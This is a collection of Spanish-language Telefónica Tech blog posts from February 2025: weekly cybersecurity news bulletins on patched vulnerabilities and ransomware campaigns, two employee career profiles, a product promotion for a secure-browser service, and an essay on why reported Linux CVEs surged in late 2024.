uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
28 de febrero de 2025
Boletín Semanal de Ciberseguridad, 15-21 febrero
Corregida una vulnerabilidad crítica en routers Juniper que permite acceso no autorizado Juniper Networks ha publicado una alerta sobre la vulnerabilidad crítica CVE-2025-21589 en los dispositivos Session Smart Router, Session Smart Conductor y WAN Assurance Managed Routers. Esta falla, con un CVSS de 9.8 según el proveedor, permite a atacantes eludir la autenticación y obtener control administrativo total sobre los dispositivos afectados. Aunque no se ha detectado explotación activa ni existen pruebas de concepto disponibles, se recomienda aplicar los parches de seguridad de manera inmediata. En entornos gestionados por un Conductor, bastaría con actualizar únicamente los nodos de este, ya que los routers conectados recibirán automáticamente el parche. Asimismo, los dispositivos operando con WAN Assurance conectados a Mist Cloud han recibido el parche de manera automática. No obstante, se recomienda actualizar también los routers individualmente. Además, desde Juniper Networls recomiendan a las organizaciones reforzar la monitorización para detectar actividad sospechosa y mitigar posibles intrusiones. Más info Ghost ransomware ataca infraestructuras críticas en más de 70 países La CISA y el FBI han alertado en un informe conjunto sobre el actor de amenazas Ghost ransomware, que habría llevado a cabo ataques a múltiples sectores en más de 70 países, incluyendo organizaciones de infraestructuras críticas. Durante estos incidentes, los atacantes explotan vulnerabilidades en software desactualizado, como Fortinet, ColdFusion y Exchange, para acceder a los sistemas de sus víctimas. Desde 2021 el grupo detrás de Ghost ransomware, también conocido como Cring o Phantom, ha empleado tácticas como la rotación de ejecutables y la modificación de notas de rescate para dificultar su identificación. Además, se ha detectado el uso de herramientas como Mimikatz y CobaltStrike para evadir defensas y desplegar el ransomware. Para mitigar riesgos asociados a esta amenaza, CISA recomienda realizar copias de seguridad fuera offline, aplicar parches de seguridad, segmentar redes y habilitar autenticación multifactor. Más info Parcheada una vulnerabilidad crítica en Apache Ignite Apache ha solucionado una vulnerabilidad con afectación a Apache Ignite en sus versiones anteriores a la 2.17.0 hasta la versión 2.6.0. El fallo, identificado como CVE-2024-52577 (CVSSv4 de 9.5 según fabricante), permite a atacantes remotos ejecutar código arbitrario en servidores vulnerables con los mismos privilegios que el proceso Ignite, explotando mecanismos de deserialización inseguros en configuraciones específicas gracias a la validación incompleta de los flujos de datos entrantes. Los nodos servidor de Ignite procesan los mensajes entrantes utilizando el marco de serialización/deserialización de Java. En las versiones afectadas, se obvian los filtros de serialización de clases para determinados puntos finales de la red, lo que los atacantes aprovechan para crear mensajes que contengan objetos dañinos y eludir dichos filtros. Apache Ignite ha corregido el fallo en la versión 2.17.0 aplicando filtros de clase en todos los puntos finales. En caso de no poder aplicar la actualización, se recomienda restringir el acceso a los nodos Ignite, desplegar sistemas de detección de intrusos y habilitar el filtro de deserialización nativo de la JVM (jdk.serialFilter) para bloquear paquetes de alto riesgo. Más info Detectada nueva variante de XCSSET para macOS Una nueva variante del malware XCSSET ha sido detectada en ataques dirigidos a usuarios de macOS, específicamente para robar información sensible como billeteras digitales y datos de la app Notes. Esta variante, que mejora las versiones anteriores, ha sido identificada por Microsoft y presenta una ofuscación de código avanzada, mayor persistencia, nuevas estrategias de infección y es distribuida principalmente a través de proyectos infectados de Xcode. Entre las mejoras destaca la ofuscación utilizando técnicas como Base64 y xxd (hexdump), dificultando el análisis del código. Además, implementa métodos de persistencia mediante los archivos zshrc y dock. En el primer caso, la carga útil se ejecuta cada vez que se inicia una nueva sesión de shell. En el segundo, el malware gestiona los elementos del dock para ejecutar una aplicación maliciosa junto con la legítima. XCSSET también emplea nuevas técnicas de infección en proyectos Xcode, aprovechando configuraciones como TARGET, RULE o FORCED_STRATEGY para insertar su carga útil. A través de su módulo, recopila datos confidenciales de aplicaciones, billeteras digitales, navegadores y más. Microsoft recomienda a los usuarios verificar los proyectos Xcode y repositorios no oficiales para evitar este tipo de malware. Más info Google parchea fallos críticos en Chrome que permiten ejecución de código Google ha lanzado una actualización urgente para Chrome, corrigiendo tres vulnerabilidades críticas que podrían permitir a atacantes ejecutar código arbitrario y tomar el control del sistema. Dos de los fallos son desbordamientos de búfer en el motor JavaScript V8, CVE-2025-0999, sin CVSSv3 asignado a fecha de redacción de estas líneas, y en el subsistema de la GPU, denominada CVE-2025-1426, también sin CVSSv3. Ambas habrían sido clasificadas con una severidad alta según Google y podrían facilitar la ejecución de código malicioso y la evasión de la sandbox. El tercer fallo CVE-2025-1006, sin CVSSv3 pero de severidad media según proveedor, es de tipo use-after-free en la pila de red y podría provocar la ejecución de código o fallos en el navegador. Google ha restringido detalles técnicos para evitar explotación. Además, el proveedor ha instado a actualizar Chrome de inmediato a la a la versión 133.0.6943.126/.127, ya que estos errores podrían facilitar ataques dirigidos y la instalación silenciosa de malware. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
21 de febrero de 2025
De la pasión por la tecnología a Telefónica Tech: Nicole Romero
Me llamo Nicole Valentina Romero Polo y mi historia comienza con una niña apasionada por la tecnología. Durante el colegio, mientras cursaba décimo grado, también me sumergí en el mundo de la programación a través de un técnico en software del SENA. Cuando terminé el colegio, sabía que mis opciones para ingresar a una universidad eran limitadas, así que diseñé un plan A, B y C. Mi 'plan C' fue continuar con un tecnólogo en Análisis y Desarrollo de Sistemas de Información (ADSI) en el SENA, lo cual requería completar una etapa práctica en una empresa durante seis meses. Mientras mi hoja de vida estaba publicada en la plataforma oficial de empleo del SENA me encontraba en la etapa lectiva del programa. Un día, de manera inesperada, recibí una llamada de Telefónica Tech. Me informaron que estaban interesados en trabajar conmigo. Acepté participar en su proceso de selección, y para diciembre de 2021 ya había firmado un contrato de aprendizaje con ellos. En mi primer día de prácticas estaba nerviosa y emocionada, llena de expectativas y preparada para aprender. Cómo y por qué accedí a una posición de prácticas El SENA exige que los estudiantes completen una etapa lectiva y una práctica a través de un contrato de aprendizaje. Aunque todavía estaba en la etapa lectiva, Telefónica Tech me contactó y me invitó a participar en un proceso de selección. Después de varias entrevistas, fui seleccionada para unirme a la empresa como practicante. Mis expectativas eran muy altas. Inicié remotamente el 20 de diciembre de 2021, justo al cierre del año. Mi primer gran desafío fue gestionar un proyecto de telemetría para vehículos. Este proyecto, previamente manejado por otro proveedor, debía ser reorganizado y simplificado para que funcionara de manera efectiva en Telefónica Tech. Durante tres meses trabajé para estructurar y optimizar toda la información necesaria, logrando que el proyecto comenzara a operar con éxito. Aprendizaje y desarrollo en Telefónica Tech Mi rol inicial estaba completamente enfocado en un solo proyecto, y esta experiencia fue una gran escuela para mí. Aprendí a usar Excel a un nivel avanzado, entendí cómo funcionaba la telemetría en los vehículos y desarrollé habilidades que no sabía que tenía. Una de las más valiosas fue la redacción de correos corporativos, donde las correcciones de mi jefe me ayudaron a mejorar muchísimo. Mi experiencia en Telefónica Tech ha sido transformadora, tanto a nivel personal como profesional. Además, fortalecí mis habilidades de liderazgo. Aunque ya había trabajado en equipo como estudiante, entendí que la dinámica laboral es distinta y requiere más organización y comunicación efectiva. Mis compañeros y superiores fueron fundamentales en mi curva de aprendizaje, brindándome apoyo constante y motivándome a crecer. Retos y expectativas hacia tu contratación como empleado Durante mi tiempo como practicante, enfrenté varios retos. Uno de ellos fue organizar proyectos con poca información inicial. Para superarlos, me enfoqué en la investigación, la comunicación constante con mis colegas y una actitud proactiva. Aprendí que cada error era una oportunidad para mejorar y que mantener una mentalidad positiva me ayudaba a mantenerme motivada. Cuando recibí la oferta para continuar en Telefónica Tech como empleada me sentí orgullosa y consciente de los nuevos desafíos y responsabilidades que implicaba. De practicante a empleado de Telefónica Tech El cambio de practicante a empleada fue emocionante. Mis responsabilidades crecieron rápidamente, pasando de manejar un solo proyecto a gestionar varios en una nueva área. A pesar del aumento en el volumen de trabajo, la transición fue sencilla gracias a las bases que adquirí durante mi etapa práctica y al continuo apoyo de mis superiores y compañeros. Durante esta transición, además, decidí retomar mis estudios universitarios y comencé la carrera de Ingeniería de Sistemas. Gracias a mi trayectoria previa con el SENA, me homologaron hasta sexto semestre, lo que fue un gran impulso para avanzar rápidamente en mi formación académica. Sin embargo, este nuevo reto implicó equilibrar mis labores en Telefónica Tech con la asistencia a clases, manteniendo siempre la disciplina y dedicación que me caracterizan. Trabajar y estudiar al mismo tiempo reforzó mi capacidad de organización y resiliencia. Al finalizar la carrera elegí realizar mis prácticas universitarias en Telefónica Tech como parte de la validación de experiencia profesional, ya que era una de las opciones disponibles en mi universidad. Finalmente, culminé mis estudios con éxito y me gradué como ingeniera de sistemas en septiembre de 2024. Crecimiento profesional Mi experiencia en Telefónica Tech ha sido transformadora, tanto a nivel personal como profesional. Durante mi tiempo aquí, desarrollé habilidades técnicas, como el análisis de datos y la gestión de proyectos, y habilidades blandas, como el liderazgo y la comunicación efectiva. Estas herramientas me han permitido desempeñarme con confianza en mi rol y enfrentar desafíos cada vez mayores. Además, la decisión de retomar mis estudios universitarios en Ingeniería de Sistemas mientras trabajaba fue un paso crucial en mi desarrollo. La homologación de materias gracias a mi trayectoria en el SENA me permitió avanzar hasta sexto semestre de la carrera. Sin embargo, equilibrar mis responsabilidades laborales con las académicas fue un gran reto. Este proceso fortaleció mi capacidad de organización y disciplina, valores que considero esenciales para mi crecimiento profesional. Para mí el talento es la capacidad de adaptarse, aprender y contribuir con pasión y compromiso al crecimiento colectivo. Realizar mis prácticas universitarias en Telefónica Tech como validación de experiencia profesional fue el broche perfecto para mi formación. Culminar mi carrera y obtener mi título de Ingeniera de Sistemas es, hasta ahora, uno de mis mayores logros. A futuro, mis metas incluyen seguir creciendo en el ámbito de la tecnología y liderar proyectos innovadores que tengan un impacto significativo. Mi consejo para quienes aspiran a convertirse en empleados de Telefónica Tech es simple: aprovechen cada oportunidad, no tengan miedo de cometer errores y mantengan una mentalidad abierta al aprendizaje constante. Conclusión Desde mis días como practicante hasta mi posición actual, mi trayectoria en Telefónica Tech ha sido una experiencia de crecimiento continuo. Inicié gestionando un proyecto de telemetría como practicante, luego pasé a ser Analista de Operaciones, y hoy me desempeño orgullosamente como Project Manager. Cada etapa ha estado llena de aprendizajes, retos y logros que han moldeado mi perfil profesional. Mi experiencia es prueba de que, con disciplina, dedicación y apoyo, es posible alcanzar metas ambiciosas. Espero que mi historia inspire a otros practicantes y profesionales en formación a perseguir sus sueños y aprovechar cada oportunidad al máximo. A los futuros aprendices de Telefónica Tech, les digo: aprovechen esta experiencia al máximo. Sean curiosos, mantengan una actitud de aprendizaje constante y no teman a los desafíos, porque serán los momentos donde más crecerán.
19 de febrero de 2025
Security Edge protege frente a la amenaza que representan los dispositivos no gestionados
Más del 50% de todos los dispositivos en las redes corporativas son lo que se conoce como dispositivos no gestionados: empleados, proveedores y socios utilizan dispositivos que no son de la empresa para acceder a las aplicaciones corporativas a través de navegadores web. Aunque este enfoque aumenta la productividad, a la vez genera riesgos de seguridad debido a la falta de control y visibilidad sobre esos dispositivos y los convierte en potenciales puntos de entrada para atacantes. Por lo tanto, estos dispositivos, deben cumplir con unos mínimos de seguridad antes de acceder a las aplicaciones corporativas para no exponer a las empresas a riesgos como: Robo de credenciales. Compartición de datos críticos a través de herramientas de trabajo colaborativo (Microsoft 365, google Workspace, etc) de forma accidental sin necesidad de una intención maliciosa. Uso inadecuado de herramientas de Inteligencia artificial que pueden contribuir a la publicación de datos confidenciales de la corporación (Chat GPT, Copilot, etc.) El acceso de los proveedores y socios a datos confidenciales en aplicaciones críticas de negocio a las cuales tienen que acceder para realizar su trabajo (Salesforce, SAP, Workday, etc.) Puerta de entrada de software malicioso a la red corporativa. ⚠️ Estas amanezas pueden provocar graves consecuencias para las empresas, incluyendo pérdida de confianza, daños financieros y operativos, así como posibles repercusiones legales y regulatorias. ¿Cuál es su impacto? El 80%-90% de los ataques de ransomware que tuvieron éxito se originaron a través de dispositivos no gestionados. El 68% de las empresas españolas no están protegidas contra ciberataques. El coste promedio de una brecha de datos en 2023 fue de $4.45 millones, un aumento del 15% en 3 años. Está previsto que el coste global del cibercrimen alcance los $9,22 billones en 2024, aumentando a $13,82 billones en 2028. ¿Cómo abordar el problema? Security Edge con tecnología Palo Alto Networks incorpora el módulo Prisma Access Browser que proporciona la solución a este problema, ya que transforma el dispositivo no gestionado en un espacio de trabajo seguro, otorgando a los equipos corporativos de seguridad control sobre todos los servicios web y acciones del usuario. Con este módulo, un usuario autorizado puede acceder de forma segura a cualquier aplicación web desde cualquier dispositivo y ubicación, sin comprometer la seguridad de la empresa, permitiendo: Implementar el enfoque Zero Trust en el navegador web, basado en la premisa de que se debe verificar y validar continuamente la identidad y el estado de los dispositivos, usuarios y aplicaciones antes de permitir el acceso a recursos corporativos. Crear un espacio de trabajo seguro para la navegación web en cualquier dispositivo, protegiendo los activos del navegador y reduciendo la superficie de ataque. Evitar la pérdida de datos sensibles o confidenciales al proteger información mientras se utilizan aplicaciones a través de navegadores. Esta característica evita activamente que datos sensibles se compartan, transfieran o filtren sin autorización, cumpliendo con políticas corporativas y normativas de datos. Puede instalarlo cualquier usuario sin necesidad de tener derechos de administrador. Beneficios principales de Security Edge El 100% de los dispositivos protegidos: garantiza la seguridad y protege los datos corporativos independientemente del dispositivo. Ahorros del 85% en comparación con suministrar dispositivos a todos los colaboradores y trabajadores remotos. Ahorros del 79% en el TCO frente a VDI: reducción significativa del coste total de propiedad en comparación con las soluciones tradicionales de VDI, gracias a una arquitectura eficiente y basada en la nube Cobertura de extremo a extremo, -desde el diseño a la operación, a través de un equipo de expertos con las máximas certificaciones, para garantizar el éxito del proyecto. Security Edge ofrece despliegue, configuración y gestión de una colección completa de capacidades de seguridad integradas en una única plataforma de servicio, entre las que se encuentra Prisma Access Browser. El servicio permite diseñar al cliente la solución que mejor se adapta sus necesidades, y garantizar la seguridad tanto en dispositivos gestionados como no gestionados. AUTORES KATTERINE NODARSE Global Product Manager JOSÉ ANTONIO VELASCO Product Manager ____ Ciberseguridad ¿Cómo Clean Email y Security Edge protegen tu cadena de suministro? 10 de octubre de 2024
18 de febrero de 2025
Boletín Semanal de Ciberseguridad, 8-14 febrero
Microsoft corrige cuatro vulnerabilidades 0-day en su Patch Tuesday de febrero Microsoft ha publicado su Patch Tuesday de febrero de 2025 corrigiendo 55 fallos de seguridad. En este Patch Tuesday se incluyen cuatro vulnerabilidades 0-day, dos de las cuales estarían siendo explotadas activamente. Estas vulnerabilidades han sido denominadas CVE-2025-21391, CVSSv3 7.1 según Microsoft y que permite a atacantes eliminar archivos del sistema, y CVE-2025-21418, con CVSSv3 7.8 según proveedor y que otorga privilegios SYSTEM en Windows. Microsoft no ha publicado más información acerca de los ataques en los que estos fallos estaban siendo explotados activamente. Asimismo, los otros dos fallos 0-day que han sido parcheados son CVE-2025-21194, CVSSv3 7.1 según Microsoft, que permite evadir la seguridad en dispositivos Surface, y CVE-2025-21377, CVSSv3 6.5 según proveedor, que expone hashes NTLM de usuarios. Además, se han corregido tres fallos críticos de ejecución remota de código. La actualización también incluye parches previos para Microsoft Edge y Dynamics 365. Más info Ivanti parchea varias vulnerabilidades, tres de ellas críticas Ivanti ha publicado su boletín de seguridad de febrero, en el que proporciona parches para ocho vulnerabilidades, tres de ellas críticas, una alta y cuatro de criticidad media. La que ha recibido la puntuación más alta es la vulnerabilidad CVE-2025-22467 (CVSSv3 9.9 según proveedor), un desbordamiento de búfer en Ivanti Connect Secure que permite a atacantes autenticados desencadenar corrupción de memoria y ejecutar código arbitrario en el sistema. Las otras dos vulnerabilidades críticas son CVE-2024-38657 (CVSSv3 9.1 según Ivanti), vulnerabilidad de control externo de nombres de archivo en Ivanti Connect Secure e Ivanti Policy Secure, y CVE-2024-10644 (CVSSv3 9.1 según proveedor), problema de inyección de código en Ivanti Connect Secure y Ivanti Policy Secure. Cabe destacar que la empresa ha indicado que en el momento de la publicación del boletín no se tenía conocimiento de que las vulnerabilidades hayan sido explotadas en ningún ataque. Más info Corregido un fallo MitM en OpenSSL OpenSSL ha parcheado una nueva vulnerabilidad en su biblioteca de comunicaciones seguras. El fallo fue reportado por investigadores de Apple, siendo rastreado como CVE-2024-12797 y sin puntuación CVSS asignada por el momento. OpenSSL contiene una implementación de código abierto de los protocolos SSL y TLS. Por ello, las conexiones TLS/DTLS de clientes que utilizan claves públicas sin procesar (RPK) RFC7250 pueden ser vulnerables a ataques man-in-the-middle (MitM) debido a problemas en las comprobaciones de autenticación del servidor en el modo SSL_VERIFY_PEER. La vulnerabilidad afecta a los clientes TLS que activan las RPK y confían en SSL_VERIFY_PEER para detectar fallos de autenticación, habilitando el envío de RPK en vez de una cadena de certificados X.509. No obstante, OpenSSL señaló que las RPK están desactivadas por defecto en los clientes y los servidores TLS. Las versiones afectadas son OpenSSL 3.4, 3.3 y 3.2, mitigándose la vulnerabilidad en las versiones 3.4.1, 3.3.2 y 3.2.4. Más info Cl0p ransomware ataca a 43 organizaciones aprovechando una vulnerabilidad crítica El grupo de ransomware Cl0p ha listado 43 nuevas víctimas en su sitio de filtraciones, aunque a fecha de redacción de estas líneas el actor de amenazas aún no habría publicado los datos exfiltrados. De acuerdo con un análisis publicado por Cyfirma, de entre estas nuevas víctimas publicadas los sectores más afectados son el industrial (37%), retail (26%) y transporte (14%), con un 72% de las organizaciones ubicadas en EE.UU. Los investigadores afirman que el grupo, que lleva activo desde al menos principios de 2019 y habría sido relacionado con el actor TA505 (EvilCorp), obtuvo acceso inicial mediante la explotación de la vulnerabilidad crítica CVE-2024-50623 (CVSSv3 9.8) en Cleo, permitiendo la ejecución remota de código. Asimismo, los investigadores destacan que, cuando fue publicado su análisis, más de 1,6 millones de activos estarían empleando versiones vulnerables del software. Más info Quishing 2.0: nueva técnica de distribución de malware mediante códigos QR Los investigadores de Tripwire han publicado un nuevo artículo en el que alertan sobre el auge del quishing, una técnica de fraude basada en códigos QR falsificados. Los atacantes utilizan estos códigos para redirigir a víctimas a sitios fraudulentos, robar credenciales y distribuir malware. Entre las tácticas más comunes se encuentran la inclusión de códigos QR maliciosos en correos electrónicos, impresos en lugares públicos o utilizados en ofertas engañosas. La evolución del ataque, que desde Tripwire han denominado quishing 2.0, combina redirecciones a sitios legítimos para eludir medidas de seguridad. Para mitigar el riesgo, los investigadores enfatizan la importancia de llevar a cabo las medidas de seguridad necesarias, recomendando especialmente capacitar al personal, la implementación de sistemas de autenticación multifactor y el uso de soluciones avanzadas de seguridad en correos electrónicos. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
14 de febrero de 2025
#WomenWithTech: El liderazgo financiero y humano de Raquel en Telefónica Tech USA
Cuéntanos un poco sobre ti: ¿quién eres y a qué te dedicas? Soy Raquel Guzmán, y desde hace diez años que formo parte de la familia Telefónica. Después de ocupar varios puestos en el área financiera, actualmente mi posición es Head of Finance and People en Telefónica Tech USA. ¿Cuál es tu especialización? ¿Cómo llegaste a dedicarte a lo que haces? Mi especialización es el mundo financiero. Desde que terminé mis estudios, siempre he enfocado mi carrera en el mundo de las finanzas y la contabilidad. Mi último año en la Universidad Complutense de Madrid, lo compaginé con unas prácticas de beca en una empresa de auditoría. Ahí comenzó mi primera experiencia con el mundo financiero y corporativo. Años después, trabajé en EY como auditora, dirigiendo equipos y aprendiendo de diversos tipos de negocios. Esta experiencia me preparó para unirme al área financiera de Telefónica, donde reviso las finanzas desde dentro. Actualmente, además del control financiero, gestiono recursos humanos en Telefónica Tech; una tarea nueva para mí, pero muy interesante y enriquecedora. Desde que terminé mis estudios siempre he enfocado mi carrera en el mundo de las finanzas y la contabilidad. Cuando eras pequeña, ¿pensabas que acabarías trabajando donde estás ahora? ¿Ha sido algo vocacional? Desde pequeña tenía muy claro que quería ser una mujer profesional. Siempre fui muy organizada y enfocada en mis ideas. Me gustaban las matemáticas y lo que aprendía en las clases de economía, por lo que tenía claro que mi profesión tenía que ir relacionada con este mundo. Al finalizar mis estudios universitarios, decidí continuar mi formación realizando un MBA con el objetivo de llegar a ser directora financiera y liderar una parte de una empresa. A los 24 años recibí un comentario de una compañera de mi primer empleo como becaria que me marcó significativamente: me sugirió que abandonara la idea de convertirme en directora financiera, ya que consideraba que tenía aspiraciones poco realistas. Ahora, al analizar mi trayectoria profesional, puedo afirmar que he logrado alcanzar mi meta y cumplir mi sueño de ocupar el cargo de directora financiera. Siempre fui muy organizada y enfocada en mis ideas. Me gustaban las matemáticas y lo que aprendía en las clases de economía, por lo que tenía claro que mi profesión tenía que ir relacionada con este mundo. ¿Qué te motivó a escoger tu profesión? Diría que fui yo misma quien se motivó. Desde siempre me gustaron las matemáticas y todo lo relacionado con la gestión de empresas. Soy muy constante para resolver problemas y muy exigente conmigo misma. Durante mi experiencia de ocho años como auditora, tuve contacto con los directores financieros de las empresas a las que iba a auditar. Admiraba todo lo que controlaban y conocían de su empresa. Eso hizo que me diera cuenta de que quería estar ahí en algún momento. Me siento muy orgullosa de mi trayectoria profesional. Realmente nunca he dejado de trabajar en lo que quería, en el mundo financiero, desde que comenzó mi vida laboral. ¿Cómo describirías tu trayectoria profesional hasta ahora y cuáles son las habilidades que utilizas en Telefónica Tech? Me siento muy orgullosa de mi trayectoria profesional. Realmente nunca he dejado de trabajar en el mundo financiero desde que comenzó mi vida laboral. Siempre he ido aprendiendo cosas nuevas de cada posición en la que he estado. El haber trabajado como auditora en mis primeros años de vida laboral hizo que aprendiese cómo funcionan diferentes departamentos y qué procesos se llevan a cabo en cada uno de ellos. Esa experiencia me aportó gran conocimiento para adquirir la visión global de una compañía. Viajar es una de las pasiones de Raquel. En Quito, Ecuador En mi posición actual en Telefónica Tech, tanto en el área Financiera como en la de Personas, tengo que supervisar el funcionamiento de cada uno de los departamentos. Esto incluye desde la preventa hasta el área de operaciones, pasando por el área comercial, para controlar rendimientos, costes y eficiencia en los recursos. Se busca mantener el equilibrio entre el área Financiera y los recursos necesarios para llevar a cabo la operación en USA. Además del control financiero, gestiono recursos humanos en Telefónica Tech. Es una tarea nueva para mí, pero muy interesante y enriquecedora. ¿Cómo concilias tu puesto de alta responsabilidad con tu vida personal? Los primeros años del cargo fueron muy duros y prácticamente dediqué la mayoría del tiempo al gran proyecto de Telefónica Tech. Creo que todos los que hemos empezado desde cero en Telefónica Tech la sentimos un poquito nuestra a nivel personal. Es un nuevo proyecto y un reto. Han pasado cuatro años y ahora sí puedo decir que concilio mi trabajo (el cual me encanta) con mi vida personal. Para conciliar lo que hago es poner límites y horarios a cada una de las funciones. Así consigo hacer todo lo que quiero en mi día a día. ¿Cómo promueve Telefónica Tech la diversidad de género y la inclusión? Telefónica Tech es un excelente lugar para trabajar, tanto para mujeres como para hombres. Es cierto que se potencia mucho la visibilidad de la mujer emprendedora y se potencia y anima a ser mejor cada día. A la mujer no se le ha dado su lugar en el ámbito profesional durante mucho tiempo, y Telefónica Tech apuesta día a día por cambiar esto y dar el lugar que le corresponde, tanto a hombres como mujeres, de una forma igualitaria. Es lo que buscamos todas las mujeres, sobre todo en equipos directivos. Telefónica Tech apuesta día a día por dar el lugar que le corresponde a cada uno, tanto a hombres como mujeres. ¿Qué significa para ti la iniciativa #WomenWithTech? #WomenWithTech para mí es la plataforma para dar visibilidad a la mujer en un entorno laboral que, históricamente, ha sido ocupado en su mayoría por hombres. Demuestra y valora el potencial que tenemos las mujeres en cualquier ámbito. ¿Qué aportamos las mujeres a las profesiones STEAM? Las profesiones STEAM, históricamente, siempre han sido carreras destinadas a los hombres. Las mujeres, por nuestra forma de organización y disciplina, aportamos un enfoque diferente a estas profesiones. Incluyendo igualdad y equidad, haciendo que la tecnología y la ciencia se desarrollen de otra manera. También los referentes en estas profesiones han sido predominantemente hombres. Sin embargo, la creciente presencia de mujeres, especialmente en roles directivos, promueve una mayor inclusión y diversidad. Este cambio alienta a más niñas y jóvenes a interesarse por áreas que tradicionalmente se consideraban dominadas por hombres. ¿Qué consejo darías a otras mujeres que desean seguir una carrera STEAM? ¿Qué habilidades necesitas para tener éxito en tecnología? Mi consejo para otras mujeres que quieran desarrollarse en una carrera STEAM es que sigan su instinto y sean constantes haciendo lo que les gusta. No hay carrera o profesión de 'hombres' o 'mujeres'. Lo importante es luchar y perseguir lo que te gusta. De esta manera se consigue estar donde se sueña desde pequeña. Como habilidades a desarrollar destacaría constancia, pasión, ambición y ganas de aprender y desarrollarse continuamente. Telefónica Tech #WomenWithTech: María construye soluciones con propósito para la digitalización industrial 16 de enero de 2025
13 de febrero de 2025
Linux y la paradoja de las vulnerabilidades: más reportes, ¿más seguridad?
Recientemente hemos publicado nuestro Informe sobre el estado de la seguridad 2024 H2, un detallado análisis en torno a las principales amenazas, vulnerabilidades y tendencias en el ámbito de la Ciberseguridad durante el segundo semestre del año pasado. En el apartado que se refiere a la identificación de las vulnerabilidades críticas descubiertas en el semestre observamos aumento significativo en el número de vulnerabilidades reportadas y corregidas asociadas a Linux. Mientras que en semestres anteriores se registraban en torno a 200 vulnerabilidades, en el segundo semestre de 2024 se han documentado 1.215. Esto representa un incremento de más del 500% que no tiene una explicación única y fácil, lo que ha generado preguntas sobre su causa y significado. Fuente: Informe sobre el estado de la seguridad 2024 H2. A primera vista esto podría parecer una señal de mayor inseguridad, pero la realidad es mucho más compleja. Para comprender mejor este fenómeno, hemos recopilado explicaciones que podrían ayudar a dar respuesta a este incremento en el número de vulnerabilidades reportadas. ■ Los CVE (Common Vulnerabilities and Exposures) son identificadores únicos asignados a vulnerabilidades de seguridad conocidas en software y sistemas. Su propósito es estandarizar la identificación y documentación de fallos, facilitando su seguimiento y mitigación para gestionar amenazas, aplicar medidas correctivas y mejorar la seguridad en los sistemas de manera más eficiente. 1. El kernel de Linux como Autoridad de Numeración de CVE (CNA) Una explicación clave para este incremento es que, en 2024, el kernel de Linux fue acreditado como Autoridad de Numeración de CVE (CNA) por el Programa CVE. Esto permite al equipo del kernel asignar identificadores CVE a las vulnerabilidades que descubren y corrigen. Debido a esto la documentación de vulnerabilidades se ha vuelto más detallada y frecuente, y eso ha contribuido al aumento del número de los CVE registrados en la segunda mitad de 2024. Este cambio ha incrementado la transparencia en el proceso de divulgación de vulnerabilidades y ha permitido una mejor organización en la gestión de seguridad del kernel. Aunque el número de CVE reportados ha aumentado, esto no indica necesariamente un incremento en la inseguridad del sistema y podría indicar justo lo contrario: una mejora en la documentación y visibilidad de los problemas resueltos. Como ahora es más fácil la gestión de CVE, incluso los fallos más minúsculos serán reportados y clasificados. 2. Transparencia del código abierto A diferencia de los sistemas propietarios, Linux opera bajo un modelo de código abierto, lo que significa que cualquiera puede examinar su código, buscar fallos y reportarlos. Esta transparencia lleva a que las vulnerabilidades sean documentadas de manera pública y accesible. Esto implica que la percepción de seguridad basada únicamente en el número de vulnerabilidades registradas es engañosa. Un sistema con menos reportes no es necesariamente más seguro: podría simplemente ser menos auditado o menos transparente en la divulgación de fallos. 3. La seguridad como un proceso activo Linux cuenta con una comunidad global de desarrolladores e investigadores de seguridad que trabajan de manera continua para encontrar y corregir vulnerabilidades. Este nivel de escrutinio podría ser mayor que en el caso de otros sistemas cuyas auditorias de seguridad dependen solo de los equipos que los desarrollan. Un sistema con una comunidad activa que constantemente busca errores y los corrige es más seguro a largo plazo. En este sentido, el aumento en los CVE reportados podría no ser un signo de debilidad, sino de una vigilancia constante que permite resolver problemas antes de que puedan ser explotados. 4. Omnipresencia de Linux: más código, más reportes Linux no es un sistema operativo rígido y limitado a un único tipo de uso. Se encuentra presente en servidores empresariales, sistemas embebidos, dispositivos IoT, supercomputadoras o smartphones. Este uso tan diverso implica una base de código enorme con distintas capas de funcionalidad, desde el kernel hasta los módulos y drivers. Cada nueva aplicación de Linux introduce nuevos escenarios de seguridad que requieren revisión. Mientras más amplio sea el ecosistema Linux, más vulnerabilidades potenciales surgirán simplemente por la escala de su implementación y usos. Sin embargo, esto no significa que Linux sea inherentemente más inseguro, sino que es un sistema que evoluciona para adaptarse a todos estos entornos. 5. No se trata solo de encontrar fallos, sino de solucionarlos El hecho de que el ecosistema de Linux haya corregido más de 1.200 vulnerabilidades en seis meses podría significar una señal de buena salud. En la industria del software, lo realmente preocupante no es cuántas vulnerabilidades se encuentran, sino cuánto tiempo permanecen sin solución. El ecosistema de Linux, con su estructura de desarrollo abierto y su modelo de actualizaciones frecuentes, permite una corrección rápida de los errores. 6. La definición de ‘Linux’ y la forma de contar vulnerabilidades Otro factor clave es cómo se contabilizan los CVE en Linux. La categoría ‘Linux’ en los reportes de vulnerabilidades no solo incluye el kernel principal, sino también una amplia variedad de módulos, drivers y componentes periféricos. Cada uno de estos elementos puede generar CVE individuales, lo que aumenta artificialmente el número total reportado. Si un driver específico recibe múltiples reportes de vulnerabilidad, cada uno puede ser contabilizado como un CVE separado, aunque su impacto real sobre la seguridad general del sistema sea mínimo. Este nivel de granularidad en los reportes contribuye a inflar las cifras, pero no significa necesariamente que el núcleo del sistema sea más inseguro. Conclusión La percepción de seguridad basada en la cantidad de vulnerabilidades reportadas puede ser engañosa. En el caso de Linux, el aumento en el número de CVE puede deberse a que es un sistema abierto y auditado donde los fallos se encuentran, documentan y corrigen de forma rápida y transparente. También muy probablemente reflejan la conversión del kernel de Linux en Autoridad de Numeración de CVE, aumentando la visibilidad y responsabilidad en la gestión de vulnerabilidades. La seguridad de cualquier sistema no depende solo de la cantidad de vulnerabilidades encontradas, sino también de cómo se gestionan y de las medidas que se toman para mitigar riesgos. En última instancia, la interpretación de este tipo de datos siempre debe de hacerse en contexto, considerando no solo la cantidad de vulnerabilidades reportadas, sino también su gravedad, tiempo de resolución y modelo de desarrollo. Evaluar la seguridad de un sistema requiere un análisis más amplio que va más allá de las cifras brutas de vulnerabilidades acumuladas. — POR David García, 